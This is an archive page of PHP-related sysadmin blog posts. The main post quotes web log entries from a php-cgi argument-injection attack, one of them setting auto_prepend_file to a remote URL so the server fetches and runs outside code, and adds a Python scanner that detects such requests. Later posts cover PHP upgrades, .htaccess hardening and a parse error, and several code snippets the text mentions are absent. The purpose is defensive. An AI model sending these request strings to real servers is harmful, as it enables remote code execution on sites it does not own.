
Archive | PHP

Local File Inclusion Attacks

We’ve seen several sites compromised in the last few weeks using a “local file inclusion” vulnerability with “php://input”. Here are some sample log entries:

91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://gofastdownload.com/rf/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80 (Windows NT 6.1; U; MRA 8.0 (build 5745); ru) Presto/2.10.229 Version/11.64"

This page explains the attack:

http://zerofreak.blogspot.com/2012/04/lfi-exploitation-via-phpinput-shelling.html

One of the compromised sites was running ExpressionEngine and one was running Drupal.

Here’s a bit of PHP code that I added to index.php to stop further attacks:

Obviously this is a very serious threat. We would advise all sites to test for this vulnerability.
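As an added example (not the author's index.php snippet, which is not reproduced on this page), the following Python script scans Apache combined-format log lines like the ones above and flags requests that carry php-cgi option injection. Note that auto_prepend_file is processed before the main script runs, so a guard inside index.php only executes after any prepended payload has already run; the dependable fixes are upgrading PHP or rejecting such query strings at the web server. The sample lines are constructed, modelled on the two entries above with the download URL replaced by a placeholder.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines modelled on the post's two entries, plus one benign request.
SAMPLE_LOG = """\
91.224.160.25 - - [23/May/2013:12:23:54 +0000] "POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 247 "-" "Mozilla/5.0"
89.111.24.97 - - [29/May/2013:08:38:22 +0000] "GET /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://example.invalid/code.txt HTTP/1.1" 200 1104 "-" "Opera/9.80"
203.0.113.7 - - [29/May/2013:09:00:01 +0000] "GET /index.php?page=about&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined log: client, identd, user, [time], "request", status, bytes, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# php.ini directives an attacker would set through injected -d options.
SENSITIVE_INI = ("allow_url_include", "auto_prepend_file", "auto_append_file",
                 "disable_functions", "open_basedir", "safe_mode")


def classify_query(raw_query: str) -> list[str]:
    """Return why a raw (still URL-encoded) query string looks like php-cgi option injection."""
    reasons = []
    decoded = unquote_plus(raw_query)
    # Vulnerable php-cgi handed a query string with no literal '=' to its option parser,
    # which is why the samples encode '=' as %3d. Look for -x style tokens in such queries.
    if "=" not in raw_query and any(tok.startswith("-") for tok in decoded.split()):
        reasons.append("option-style tokens in a query string with no literal '='")
    reasons.extend(f"sets {name}" for name in SENSITIVE_INI if name in decoded)
    if "php://input" in decoded:
        reasons.append("uses php://input as a script source")
    return reasons


def scan_log(text: str) -> list[dict]:
    """Parse each log line and return one finding per request matching the injection pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        raw_query = m.group("target").partition("?")[2]
        reasons = classify_query(raw_query)
        if reasons:
            findings.append({"ip": m.group("ip"), "time": m.group("time"), "method": m.group("method"),
                             "query": unquote_plus(raw_query), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['query']!r}: {'; '.join(f['reasons'])}")
```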


Upgrade PHP on Server with IUS Repository

It’s easy to upgrade between PHP versions if you’re using the IUS repository:

http://iuscommunity.org

Start by determining which version and modules you have already installed:

So in this case we have the “php52” packages.

Next decide which package set you want to upgrade to. Right now in IUS the choices are:

  1. php52
  2. php53u
  3. php54

IUS provides a great extension for yum which allows for replacing packages:

Now you can replace the PHP version with something like this:

Just change php52 and php53 to the version you currently have installed and the version you want to replace it with.

After the install completes, run “yum list | grep php | grep installed” again and make sure that you still have all the extensions you need.


Block PHP Execution With .htaccess In Folder

For a server using Plesk add the following lines to a .htaccess file to stop execution of PHP scripts in the folder:

I like to use this to protect cache and image upload folders that are writable by the web server but should not be able to execute code.

As a further precaution, chown the .htaccess to root so it can’t be overwritten by Apache or FTP, and set “chattr +i” on it to be sure.


PHP Parse error: syntax error, unexpected $end

There are two common causes of this error:

1. You have an actual syntax error in your code that needs to be fixed.

2. Your code is expecting the PHP “short_open_tag” setting to be turned on and it is not.

This second case is common when you’re moving a site between servers: the old server has short_open_tag turned on and the code works, but the new server has it turned off and the code breaks.

The solution to the second case is to either (a) modify the code to remove the dependency on short_open_tag or (b) turn on short_open_tag in php.ini or your .htaccess file.
